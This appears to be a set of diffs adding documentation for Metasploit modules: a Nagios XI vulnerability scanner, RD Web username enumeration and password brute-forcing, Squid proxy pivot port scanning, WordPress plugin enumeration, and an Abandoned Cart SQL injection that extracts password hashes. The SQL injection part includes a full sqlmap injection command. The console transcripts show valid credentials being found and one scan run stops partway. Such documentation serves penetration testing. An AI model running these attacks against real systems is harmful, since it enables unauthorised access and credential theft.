msf6 > use auxiliary/scanner/http/nagios_xi_scanner
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set rhosts 192.168.1.16
rhosts => 192.168.1.16
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set password nagiosadmin
password => nagiosadmin
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set finish_install true
finish_install => true
msf6 auxiliary(scanner/http/nagios_xi_scanner) > show options
Module options (auxiliary/scanner/http/nagios_xi_scanner):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL true no If the Nagios XI installation has not been completed, try to do so
. This includes signing the license agreement.
PASSWORD nagiosadmin no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.16 yes The target host(s), range CIDR identifier, or hosts file with synt
ax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME nagiosadmin no Username to authenticate with
VERSION no Nagios XI version to check against existing exploit modules
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/nagios_xi_scanner) > run
[*] Attempting to authenticate to Nagios XI...
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
[*] Attempting to authenticate to Nagios XI...
[!] The Nagios XI license agreement has not yet been signed on the target.
[*] Attempting to sign the Nagios XI license agreement...
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.5
[+] The target appears to be vulnerable to the following 1 exploit(s):
[*]
[*] CVE-2020-35578 exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
[*]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
@@ -0,0 +1,94 @@
## Vulnerable Application
The Microsoft RD Web login is vulnerable to the same type of authentication username enumeration vulnerability
that is present for OWA. By analyzing the time it takes for a failed response, the RDWeb interface can be used
to quickly test the validity of a set of usernames. The module additionally supports testing username password
combinations. Additionally, this module can attempt to discover the target NTLM domain if you don't already know it.
This module also reports credentials to the credentials database when they are discovered.
## Verification Steps
- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/http/rdp_web_login`
- [ ] `set rhost TARGET_IP`
- [ ] `set username USER_OR_FILE`
- [ ] `set password PASSWORD_OR_FILE` (Only if you want to test the password brute forcing)
- [ ] `set domain DOMAIN` (Only if you don't want to test the domain discovery feature)
- [ ] Check output for validity of your test username(s), password(s), and domain
## Options
### domain
The target domain to use for the username checks. If not provided, enum_domain needs to be set to true so it can be discovered.
### enum_domain
Enumerate the domain by using an NTLM challenge/response and parsing the AD Domain out.
### username
Either a specific username to verify or a file with one username per line to verify.
### password
Either a specific password to attempt or a file with one password per line to verify.
If not provided, uses the same None password for all requests
### verify_service
Whether or not to verify that RDWeb is installed prior to scanning. Defaults to true.
### user_agent
An alternate User Agent string to use in HTTP requests. Defaults to Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0.
## Scenarios
If an RDWeb login page is discovered, you can use this module to gather valid usernames for a brute force attack.
Specific target output replaced with Ys so as not to disclose information
```msf6 > use auxiliary/scanner/http/rdp_web_login
msf6 auxiliary(scanner/http/rdp_web_login) > set username /home/kali/users.txt
username => /home/kali/users.txt
msf6 auxiliary(scanner/http/rdp_web_login) > set RHOSTS YY.YYY.YYY.YY
RHOSTS => YY.YYY.YYY.YY
msf6 auxiliary(scanner/http/rdp_web_login) > run
[*] Running for YY.YYY.YYY.YY...
[+] Found Domain: YYYYYYYYYYYY
[-] Username YYYYYYYYYYYY\wrong is invalid! No response received in 1250 milliseconds
[+] Username YYYYYYYYYYYY\YYYYY is valid! Response received in 628.877 milliseconds
[-] Username YYYYYYYYYYYY\k0pak4 is invalid! No response received in 1250 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed```
If an RDWeb login page is discovered, you can use this module to perform a brute force attack.
```msf6 > use auxiliary/scanner/http/rdp_web_login
msf6 auxiliary(scanner/http/rdp_web_login) > set RHOSTS 192.168.148.128
RHOSTS => 192.168.148.128
msf6 auxiliary(scanner/http/rdp_web_login) > set username /home/kali/users.txt
username => /home/kali/users.txt
msf6 auxiliary(scanner/http/rdp_web_login) > set password /home/kali/passwords.txt
password => /home/kali/passwords.txt
msf6 auxiliary(scanner/http/rdp_web_login) > set timeout 500
timeout => 500
msf6 auxiliary(scanner/http/rdp_web_login) > run
[*] Running for YY.YYY.YYY.YY...
[+] Found Domain: YYYY
[-] Login YYYY\wrong:password is invalid! No response received in 500 milliseconds
[-] Login YYYY\wrong:Password1! is invalid! No response received in 500 milliseconds
[+] Password password is invalid but YYYY\k0pak4 is valid! Response received in 155.648 milliseconds
[+] Login YYYY\k0pak4:Password1! is valid!
[+] Password password is invalid but YYYY\Administrator is valid! Response received in 77.852 milliseconds
[+] Password Password1! is invalid but YYYY\Administrator is valid! Response received in 76.029 milliseconds
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed```
## Version and OS
Tested against Microsoft IIS 10.0 and RDWeb on Windows Server 2019 and Windows Server 2016
## References
- https://raxis.com/blog/rd-web-access-vulnerability
@@ -0,0 +1,283 @@
## Description
A exposed Squid proxy will usually allow an attacker to make requests on their behalf. If misconfigured, this may give the attacker information about devices that they cannot normally reach. For example, an attacker may be able to make requests for internal IP addresses against an open Squid proxy exposed to the Internet, therefore performing a port scan against the internal network.
The `auxiliary/scanner/http/open_proxy` module can be used to test for open proxies, though a Squid proxy does not have to be on the open Internet in order to allow for pivoting (e.g. an Intranet Squid proxy which allows the attack to pivot to another part of the internal network).
This module will not be able to scan network ranges or ports denied by Squid ACLs. Fortunately it is possible to detect whether a host was up and the port was closed, or if the request was blocked by an ACL, based on the response Squid gives. This feedback is provided to the user in meterpreter `VERBOSE` output, otherwise only open and permitted ports are printed.
### Vulnerable Application Setup
The [official Squid configuration documentation](https://wiki.squid-cache.org/SquidFaq/ConfiguringSquid) covers the significant flexibility of the Squid proxy. For this module, the most relevant core Squid configuration lines usually looks like this (default for version 3.5):
```
http_port 3128
acl localnet src 10.0.0.0/8 # RFC1918 possible internal network
acl localnet src 172.16.0.0/12 # RFC1918 possible internal network
acl localnet src 192.168.0.0/16 # RFC1918 possible internal network
acl localnet src fc00::/7 # RFC 4193 local private network range
acl localnet src fe80::/10 # RFC 4291 link-local (directly plugged) machines
acl SSL_ports port 443
acl Safe_ports port 80 # http
acl Safe_ports port 21 # ftp
acl Safe_ports port 443 # https
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl Safe_ports port 1025-65535 # unregistered ports
acl CONNECT method CONNECT
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow localhost manager
http_access deny manager
#
# INSERT YOUR OWN RULE(S) HERE TO ALLOW ACCESS FROM YOUR CLIENTS
#
http_access allow localnet
http_access allow localhost
http_access deny all
```
In short, this opens port 3128 for proxying from `localhost` or a `localnet` ranges to any port in `Safe_ports`, and allows SSL CONNECT requests to be made to `SSL_ports` (just 443 in this example).
The references to "manager" are referring to a component of Squid which provides management controls and reports displaying statistics about the squid process as it runs, and can show useful information like file descriptors or internal hostnames and IP addresses if the ACL permits access. [See the official docs](https://wiki.squid-cache.org/Features/CacheManager) for more information on the Cache Manager.
As such, you should be able to install Squid with default configuration, and reach through it from an internal network source range to anythin the Squid proxy has a route to. If you wish to test against other ports or network ranges, modify the configuration to suit prior to testing.
## Verification Steps
To test this module, you can try the following:
1. Install Squid
1. Start the Squid service
1. Start msfconsole
1. Do: `use auxiliary/scanner/http/squid_pivot_scanning`
1. Set the `RHOSTS` and `RPORT` to be that of Squid's host address and port:
1. `set RHOSTS squid.internal`
1. `set RPORT 3128`
1. Set the `RANGE` parameter to be the destination host addresses you wish to port scan.
1. `set RANGE 192.168.0.1-192.168.0.2`
1. (Optional) Set the specific `PORTS` parameter to any ports you wish to port scan on the hosts in `RANGE`.
1. `set PORTS 21-23,80,443`
1. Do: `run`
1. You should see the module attempt to connect to the proxy, and then first port of the first host in `RANGE`. Ports will be tested sequentially until the end of `PORTS` is reached, at which point it will start from the first port on the next host in `RANGE`.
## Options
Here is a quick overview of each option within the module.
### CANARY_IP
The IP to check if the proxy always answers positively - this IP address should not normally respond.
Default value: `1.2.3.4`
### MANUAL_CHECK
Invoke the canary check, and stop the scan if the Squid proxy server appears to answer positively to every request.
Default value: `true`
### PORTS
The destination TCP ports to scan through the proxy. Ports will be scanned in ascending order.
Note: these must be TCP, this scanner cannot scan other protocols.
### Proxies
This option should not be confused with the Squid proxy you are trying to scan - this is one of the default Meterpreter paramets in which you can specify a proxy chain to use that you require to reach the Squid proxy.
### RANGE
This is the IP range you wish to sca through the Squid proxy. `PORTS` on these hosts will be scanned. Hosts are scanned in ascending order.
### RPORT
This is the port that the Squid proxy is listening on. Squid defaults to 3128.
Default value: `3128`
### SSL
Whether you need to connect to Squid with SSL. This is not normally the case.
Default value: `false`
### THREADS
The number of concurrent threads (max one per Squid host).
Default value: `1`
### VHOST
HTTP server virtual host header to send on requests.
## Scenarios and Examples
The following is a brief demo of a port scan against two hosts (`192.168.0.1` and `192.168.0.2`) through a Squid proxy responding at `10.10.10.100:3128`. You could assume that the Squid host has a public or otherwise reachable IP address, where the `192.168.0.0` network range is not normally reachable to you.
```
msf6 > use auxiliary/scanner/http/squid_pivot_scanning
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RHOSTS 10.10.10.100
RHOSTS => 10.10.10.100
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RPORT 3128
RPORT => 3128
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set PORTS 21-25,79-81,139,443,445,1433,1521,1723,3389,8080,9100
PORTS => 21-25,79-81,139,443,445,1433,1521,1723,3389,8080,9100
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RANGE 192.168.0.1-192.168.0.2
RANGE => 192.168.0.1-192.168.0.2
msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
[+] [10.10.10.100] 192.168.0.1 is alive.
[+] [10.10.10.100] 192.168.0.1:80 seems open (HTTP 200, server header: 'nginx/1.14.0 (Ubuntu)').
[+] [10.10.10.100] 192.168.0.2 is alive.
[+] [10.10.10.100] 192.168.0.2:80 seems open (HTTP 302 redirect to: 'index.php', server header: 'nginx/1.14.0 (Ubuntu)')
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Setting the `VERBOSE` option will show each port tested and explain the reason for unreachable ports, if known. This can be helpful, as a port might very well be open and responding on a host, however if it is denied by the Squid ACL you will be unable to reach it regardless.
```
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
[*] [10.10.10.100] Verifying manual testing is not required...
[*] [10.10.10.100] Requesting 192.168.0.1:21
[+] [10.10.10.100] 192.168.0.1 is alive.
[*] [10.10.10.100] 192.168.0.1 is alive but 21 is closed.
[*] [10.10.10.100] Requesting 192.168.0.1:22
[*] [10.10.10.100] 192.168.0.1:22 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.1:23
[*] [10.10.10.100] 192.168.0.1:23 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.1:24
[*] [10.10.10.100] 192.168.0.1:24 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.1:25
[*] [10.10.10.100] 192.168.0.1:25 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.1:79
[*] [10.10.10.100] 192.168.0.1:79 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.1:80
[+] [10.10.10.100] 192.168.0.1:80 seems open (HTTP 200, server header: 'nginx/1.14.0 (Ubuntu)').
[*] [10.10.10.100] Requesting 192.168.0.1:81
[*] [10.10.10.100] 192.168.0.1:81 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.1:139
[*] [10.10.10.100] 192.168.0.1:139 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.1:443
[*] [10.10.10.100] 192.168.0.1 is alive but 443 is closed.
[*] [10.10.10.100] Requesting 192.168.0.1:445
[*] [10.10.10.100] 192.168.0.1:445 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.1:1433
[*] [10.10.10.100] 192.168.0.1 is alive but 1433 is closed.
[*] [10.10.10.100] Requesting 192.168.0.1:1521
[*] [10.10.10.100] 192.168.0.1 is alive but 1521 is closed.
[*] [10.10.10.100] Requesting 192.168.0.1:1723
[*] [10.10.10.100] 192.168.0.1 is alive but 1723 is closed.
[*] [10.10.10.100] Requesting 192.168.0.1:3389
[*] [10.10.10.100] 192.168.0.1 is alive but 3389 is closed.
[*] [10.10.10.100] Requesting 192.168.0.1:8080
[*] [10.10.10.100] 192.168.0.1 is alive but 8080 is closed.
[*] [10.10.10.100] Requesting 192.168.0.1:9100
[*] [10.10.10.100] 192.168.0.1 is alive but 9100 is closed.
[*] [10.10.10.100] Requesting 192.168.0.2:21
[+] [10.10.10.100] 192.168.0.2 is alive.
[*] [10.10.10.100] 192.168.0.2 is alive but 21 is closed.
[*] [10.10.10.100] Requesting 192.168.0.2:22
[*] [10.10.10.100] 192.168.0.2:22 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.2:23
[*] [10.10.10.100] 192.168.0.2:23 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.2:24
[*] [10.10.10.100] 192.168.0.2:24 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.2:25
[*] [10.10.10.100] 192.168.0.2:25 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.2:79
[*] [10.10.10.100] 192.168.0.2:79 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.2:80
[+] [10.10.10.100] 192.168.0.2:80 seems open (HTTP 302 redirect to: 'index.php', server header: 'nginx/1.14.0 (Ubuntu)')
[*] [10.10.10.100] Requesting 192.168.0.2:81
[*] [10.10.10.100] 192.168.0.2:81 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.2:139
[*] [10.10.10.100] 192.168.0.2:139 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.2:443
[*] [10.10.10.100] 192.168.0.2 is alive but 443 is closed.
[*] [10.10.10.100] Requesting 192.168.0.2:445
[*] [10.10.10.100] 192.168.0.2:445 likely blocked by ACL.
[*] [10.10.10.100] Requesting 192.168.0.2:1433
[*] [10.10.10.100] 192.168.0.2 is alive but 1433 is closed.
[*] [10.10.10.100] Requesting 192.168.0.2:1521
[*] [10.10.10.100] 192.168.0.2 is alive but 1521 is closed.
[*] [10.10.10.100] Requesting 192.168.0.2:1723
[*] [10.10.10.100] 192.168.0.2 is alive but 1723 is closed.
[*] [10.10.10.100] Requesting 192.168.0.2:3389
[*] [10.10.10.100] 192.168.0.2 is alive but 3389 is closed.
[*] [10.10.10.100] Requesting 192.168.0.2:8080
[*] [10.10.10.100] 192.168.0.2 is alive but 8080 is closed.
[*] [10.10.10.100] Requesting 192.168.0.2:9100
[*] [10.10.10.100] 192.168.0.2 is alive but 9100 is closed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
If the Squid administrator has made the error of having an ACL be too permissive, you might even see more interesting ports. A contrived example is below, note SSH has been added to `Safe_ports`.
```
acl Safe_ports port 80 # http
acl Safe_ports port 443 # https
acl Safe_ports port 21 # ftp
acl Safe_ports port 22 # ssh
http_access deny !Safe_ports
http_access allow localhost
http_access allow localnet
http_access deny all
```
```
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set TARGETS 127.0.0.1
TARGETS => 127.0.0.1
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RANGE 127.0.0.1
RANGE => 127.0.0.1
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set PORTS 21-23
PORTS => 21-23
msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
[*] [10.10.10.100] Verifying manual testing is not required...
[*] [10.10.10.100] Requesting 127.0.0.1:21
[+] [10.10.10.100] 127.0.0.1 is alive.
[*] [10.10.10.100] 127.0.0.1 is alive but 21 is closed.
[*] [10.10.10.100] Requesting 127.0.0.1:22
[+] [10.10.10.100] 127.0.0.1:22 seems open (HTTP 200, server header: 'unknown').
[*] [10.10.10.100] Requesting 127.0.0.1:23
[*] [10.10.10.100] 127.0.0.1:23 likely blocked by ACL.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Finally, it is worth knowing that all open discovered ports are saved as services for later viewing:
```
msf6 auxiliary(scanner/http/squid_pivot_scanning) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
127.0.0.1 22 tcp unknown open SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
Protocol mismatch.
192.168.0.1 80 tcp nginx/1.14.0 (ubuntu) open <html><head>...
192.168.0.2 80 tcp nginx/1.14.0 (ubuntu) open Redirect to: index.php
```
@@ -1,11 +1,10 @@
## Description
Detects Wordpress installations and their version number.
## Vulnerable Application
Detects Wordpress installations and their version number.
Also, optionally, detects themes and plugins.
### Setup using Docksal
Install [Docksal](https://docksal.io/)
Create a new WordPress installation using `fin project create`
@@ -75,10 +74,34 @@ Admin panel: http://msf-wp.docksal/wp-admin. User/password: admin/admin
## Verification Steps
1. Do: ```use auxiliary/scanner/http/wordpress_sanner```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set VHOST [HOSTNAME]```
4. Do: ```run```
1. Do: `use auxiliary/scanner/http/wordpress_sanner`
2. Do: `set RHOSTS [IP]`
3. Do: `set VHOST [HOSTNAME]`
4. Do: `run`
## Options
### PLUGINS
If plugins should be scanned. Defaults to `true`
### PLUGINS_FILE
Which plugins list to use. Default is `data/wordlists/wp-plugins.txt`
### THEMES
If themes should be scanned. Defaults to `true`
### THEMES_FILE
Which themes list to use. Default is `data/wordlists/wp-themes.txt`
### Progress
How often to print a prorgress bar while scanning for themes/plugins. Defaults to `1000`
## Scenarios
### Wordpress 5.2 running in Docksal
@@ -99,3 +122,148 @@ msf5 auxiliary(scanner/http/wordpress_scanner) > run
msf5 auxiliary(scanner/http/wordpress_scanner) >
```
### Wordpress 5.4.2 with Plugin and Theme Enumeration
```
msf6 > use auxiliary/scanner/http/wordpress_scanner
[*] Using auxiliary/scanner/http/wordpress_scanner
msf6 auxiliary(scanner/http/wordpress_scanner) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf6 auxiliary(scanner/http/wordpress_scanner) > run
[*] Trying 1.1.1.1
[+] 1.1.1.1 - Detected Wordpress 5.4.2
[*] 1.1.1.1 - Enumerating Themes
[*] 1.1.1.1 - Progress 0/19226 (0.0%)
[*] 1.1.1.1 - Progress 1000/19226 (5.2%)
[*] 1.1.1.1 - Progress 2000/19226 (10.4%)
[*] 1.1.1.1 - Progress 3000/19226 (15.6%)
[*] 1.1.1.1 - Progress 4000/19226 (20.8%)
[*] 1.1.1.1 - Progress 5000/19226 (26.0%)
[*] 1.1.1.1 - Progress 6000/19226 (31.2%)
[*] 1.1.1.1 - Progress 7000/19226 (36.4%)
[*] 1.1.1.1 - Progress 8000/19226 (41.61%)
[*] 1.1.1.1 - Progress 9000/19226 (46.81%)
[*] 1.1.1.1 - Progress 10000/19226 (52.01%)
[*] 1.1.1.1 - Progress 11000/19226 (57.21%)
[*] 1.1.1.1 - Progress 12000/19226 (62.41%)
[*] 1.1.1.1 - Progress 13000/19226 (67.61%)
[*] 1.1.1.1 - Progress 14000/19226 (72.81%)
[*] 1.1.1.1 - Progress 15000/19226 (78.01%)
[*] 1.1.1.1 - Progress 16000/19226 (83.22%)
[*] 1.1.1.1 - Progress 17000/19226 (88.42%)
[+] 1.1.1.1 - Detected theme: twentynineteen version 1.5
[+] 1.1.1.1 - Detected theme: twentyseventeen version 2.3
[*] 1.1.1.1 - Progress 18000/19226 (93.62%)
[*] 1.1.1.1 - Progress 19000/19226 (98.82%)
[*] 1.1.1.1 - Finished scanning themes
[*] 1.1.1.1 - Enumerating plugins
[*] 1.1.1.1 - Progress 0/80624 (0.0%)
[*] 1.1.1.1 - Progress 1000/80624 (1.24%)
[*] 1.1.1.1 - Progress 2000/80624 (2.48%)
[+] 1.1.1.1 - Detected plugin: akismet version 4.1.5
[*] 1.1.1.1 - Progress 3000/80624 (3.72%)
[*] 1.1.1.1 - Progress 4000/80624 (4.96%)
[*] 1.1.1.1 - Progress 5000/80624 (6.2%)
[*] 1.1.1.1 - Progress 6000/80624 (7.44%)
[*] 1.1.1.1 - Progress 7000/80624 (8.68%)
[*] 1.1.1.1 - Progress 8000/80624 (9.92%)
[*] 1.1.1.1 - Progress 9000/80624 (11.16%)
[*] 1.1.1.1 - Progress 10000/80624 (12.4%)
[*] 1.1.1.1 - Progress 11000/80624 (13.64%)
[*] 1.1.1.1 - Progress 12000/80624 (14.88%)
[*] 1.1.1.1 - Progress 13000/80624 (16.12%)
[+] 1.1.1.1 - Detected plugin: contact-form-7 version 5.1.9
[*] 1.1.1.1 - Progress 14000/80624 (17.36%)
[*] 1.1.1.1 - Progress 15000/80624 (18.6%)
[*] 1.1.1.1 - Progress 16000/80624 (19.84%)
[*] 1.1.1.1 - Progress 17000/80624 (21.08%)
[*] 1.1.1.1 - Progress 18000/80624 (22.32%)
[+] 1.1.1.1 - Detected plugin: drag-and-drop-multiple-file-upload-contact-form-7 version 1.3.3.2
[*] 1.1.1.1 - Progress 19000/80624 (23.56%)
[*] 1.1.1.1 - Progress 20000/80624 (24.8%)
[+] 1.1.1.1 - Detected plugin: email-subscribers version 4.2.2
[*] 1.1.1.1 - Progress 21000/80624 (26.04%)
[*] 1.1.1.1 - Progress 22000/80624 (27.28%)
[*] 1.1.1.1 - Progress 23000/80624 (28.52%)
[*] 1.1.1.1 - Progress 24000/80624 (29.76%)
[*] 1.1.1.1 - Progress 25000/80624 (31.0%)
[*] 1.1.1.1 - Progress 26000/80624 (32.24%)
[*] 1.1.1.1 - Progress 27000/80624 (33.48%)
[*] 1.1.1.1 - Progress 28000/80624 (34.72%)
[*] 1.1.1.1 - Progress 29000/80624 (35.96%)
[*] 1.1.1.1 - Progress 30000/80624 (37.2%)
[*] 1.1.1.1 - Progress 31000/80624 (38.45%)
[*] 1.1.1.1 - Progress 32000/80624 (39.69%)
[*] 1.1.1.1 - Progress 33000/80624 (40.93%)
[*] 1.1.1.1 - Progress 34000/80624 (42.17%)
[*] 1.1.1.1 - Progress 35000/80624 (43.41%)
[+] 1.1.1.1 - Detected plugin: loginizer version 1.6.3
[*] 1.1.1.1 - Progress 36000/80624 (44.65%)
[*] 1.1.1.1 - Progress 37000/80624 (45.89%)
[*] 1.1.1.1 - Progress 38000/80624 (47.13%)
[*] 1.1.1.1 - Progress 39000/80624 (48.37%)
[*] 1.1.1.1 - Progress 40000/80624 (49.61%)
[*] 1.1.1.1 - Progress 41000/80624 (50.85%)
[*] 1.1.1.1 - Progress 42000/80624 (52.09%)
[*] 1.1.1.1 - Progress 43000/80624 (53.33%)
[*] 1.1.1.1 - Progress 44000/80624 (54.57%)
[*] 1.1.1.1 - Progress 45000/80624 (55.81%)
[*] 1.1.1.1 - Progress 46000/80624 (57.05%)
[*] 1.1.1.1 - Progress 47000/80624 (58.29%)
[*] 1.1.1.1 - Progress 48000/80624 (59.53%)
[*] 1.1.1.1 - Progress 49000/80624 (60.77%)
[*] 1.1.1.1 - Progress 50000/80624 (62.01%)
[*] 1.1.1.1 - Progress 51000/80624 (63.25%)
[*] 1.1.1.1 - Progress 52000/80624 (64.49%)
[*] 1.1.1.1 - Progress 53000/80624 (65.73%)
[*] 1.1.1.1 - Progress 54000/80624 (66.97%)
[*] 1.1.1.1 - Progress 55000/80624 (68.21%)
[+] 1.1.1.1 - Detected plugin: simple-file-list version 4.2.2
[*] 1.1.1.1 - Progress 56000/80624 (69.45%)
[*] 1.1.1.1 - Progress 57000/80624 (70.69%)
[*] 1.1.1.1 - Progress 58000/80624 (71.93%)
[*] 1.1.1.1 - Progress 59000/80624 (73.17%)
[*] 1.1.1.1 - Progress 60000/80624 (74.41%)
[*] 1.1.1.1 - Progress 61000/80624 (75.65%)
[*] 1.1.1.1 - Progress 62000/80624 (76.9%)
[*] 1.1.1.1 - Progress 63000/80624 (78.14%)
[*] 1.1.1.1 - Progress 64000/80624 (79.38%)
[*] 1.1.1.1 - Progress 65000/80624 (80.62%)
[*] 1.1.1.1 - Progress 66000/80624 (81.86%)
[*] 1.1.1.1 - Progress 67000/80624 (83.1%)
[*] 1.1.1.1 - Progress 68000/80624 (84.34%)
[*] 1.1.1.1 - Progress 69000/80624 (85.58%)
[*] 1.1.1.1 - Progress 70000/80624 (86.82%)
[*] 1.1.1.1 - Progress 71000/80624 (88.06%)
[*] 1.1.1.1 - Progress 72000/80624 (89.3%)
[*] 1.1.1.1 - Progress 73000/80624 (90.54%)
[*] 1.1.1.1 - Progress 74000/80624 (91.78%)
[*] 1.1.1.1 - Progress 75000/80624 (93.02%)
[*] 1.1.1.1 - Progress 76000/80624 (94.26%)
[*] 1.1.1.1 - Progress 77000/80624 (95.5%)
[*] 1.1.1.1 - Progress 78000/80624 (96.74%)
[*] 1.1.1.1 - Progress 79000/80624 (97.98%)
[*] 1.1.1.1 - Progress 80000/80624 (99.22%)
[*] 1.1.1.1 - Finished scanning plugins
[*] 1.1.1.1 - Finished all scans
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wordpress_scanner) > notes
Notes
=====
Time Host Service Port Protocol Type Data
---- ---- ------- ---- -------- ---- ----
2020-12-04 19:01:18 UTC 1.1.1.1 http 80 tcp Wordpress 5.4.2 "/"
2020-12-05 02:16:03 UTC 1.1.1.1 http 80 tcp Wordpress Theme: twentynineteen version 1.5 {}
2020-12-05 02:16:03 UTC 1.1.1.1 http 80 tcp Wordpress Theme: twentyseventeen version 2.3 {}
2020-12-05 02:16:58 UTC 1.1.1.1 http 80 tcp Wordpress Plugin: akismet version 4.1.5 {}
2020-12-05 02:18:44 UTC 1.1.1.1 http 80 tcp Wordpress Plugin: contact-form-7 version 5.1.9 {}
2020-12-05 02:19:35 UTC 1.1.1.1 http 80 tcp Wordpress Plugin: drag-and-drop-multiple-file-upload-contact-form-7 version 1.3.3.2 {}
2020-12-05 02:19:58 UTC 1.1.1.1 http 80 tcp Wordpress Plugin: email-subscribers version 4.2.2 {}
2020-12-05 02:22:41 UTC 1.1.1.1 http 80 tcp Wordpress Plugin: loginizer version 1.6.3 {}
2020-12-05 02:26:05 UTC 1.1.1.1 http 80 tcp Wordpress Plugin: simple-file-list version 4.2.2 {}
```
@@ -0,0 +1,89 @@
## Vulnerable Application
Abandoned Cart, a plugin for WordPress which extends the WooCommerce plugin,
prior to 5.8.2 is affected by an unauthenticated SQL injection via the
billing_first_name parameter of the save_data AJAX call. A valid
wp_woocommerce_session cookie is required, which has at least one item in the
cart.
The plugin can be downloaded from
[here](https://downloads.wordpress.org/plugin/woocommerce-abandoned-cart.5.8.1.zip)
You'll need to first install WooCommerce and set up a shop with at least one item.
Next, install and activate Abandoned Cart.
This module slightly replicates sqlmap running as:
```
sqlmap -u http://local.target/wp-admin/admin-ajax.php --cookie='[cookies content here]' --method='POST' --data='billing_first_name=wpdeeply&billing_last_name=wpdeeply&billing_company=wpdeeply&billing_address_1=wpdeeply&billing_address_2=wpdeeply&billing_city=wpdeeply&billing_state=wpdeeply&billing_postcode=123234&billing_country=GB&billing_phone=12324&billing_email=wpdeeply%40protonmail.com&order_notes=&wcal_guest_capture_nonce=[nonce-value]&action=save_data' -p billing_first_name --prefix="', '', '','', '',( TRUE " --suffix=")) -- wpdeeply" --dbms mysql --technique=T --time-sec=1
```
## Verification Steps
1. Install the plugin on wordpress
1. Start msfconsole
1. Do: `use auxiliary/scanner/http/wp_abandoned_cart_sqli`
1. Do: `set rhosts [ip]`
1. Do: `set cookie [cookie]`
1. Do: `run`
1. You should get username and password hashes.
## Options
### ACTION: List Users
This action lists `COUNT` users and password hashes.
### COOKIE
A valid `wp_woocommerce_session` cookie, which has at least 1 item in the cart. An example is:
`wp_woocommerce_session_d2959e58288b6133e71de74309fcabfb=257056469b604b6a005c25ea293c83f9%7C%7C1609808347%7C%7C1609804747%7C%7C499137359f4d8c16f125fba6cf58ff57`.
### COUNT
If Action `List Users` is selected (default), this is the number of users to enumerate.
The larger this list, the more time it will take. Defaults to `1`.
## Scenarios
### Wordpress 5.4.2 with WooCommerce 4.8.0 and Abandoned Cart 5.8.1 on Ubuntu 20.04 using MariaDB 10.3.22
```
resource (abandoned.rb)> use auxiliary/scanner/http/wp_abandoned_cart_sqli
resource (abandoned.rb)> set rhosts 111.111.1.111
rhosts => 111.111.1.111
resource (abandoned.rb)> set verbose true
verbose => true
resource (abandoned.rb)> set cookie "wp_woocommerce_session_d2959e58288b6133e71de74309fcabfb=257056469b604b6a005c25ea293c83f9%7C%7C1609808347%7C%7C1609804747%7C%7C499137359f4d8c16f125fba6cf58ff57"
cookie => wp_woocommerce_session_d2959e58288b6133e71de74309fcabfb=257056469b604b6a005c25ea293c83f9%7C%7C1609808347%7C%7C1609804747%7C%7C499137359f4d8c16f125fba6cf58ff57
resource (abandoned.rb)> set count 3
count => 3
resource (abandoned.rb)> run
[*] Checking /wp-content/plugins/woocommerce-abandoned-cart/readme.txt
[*] Found version You in the plugin
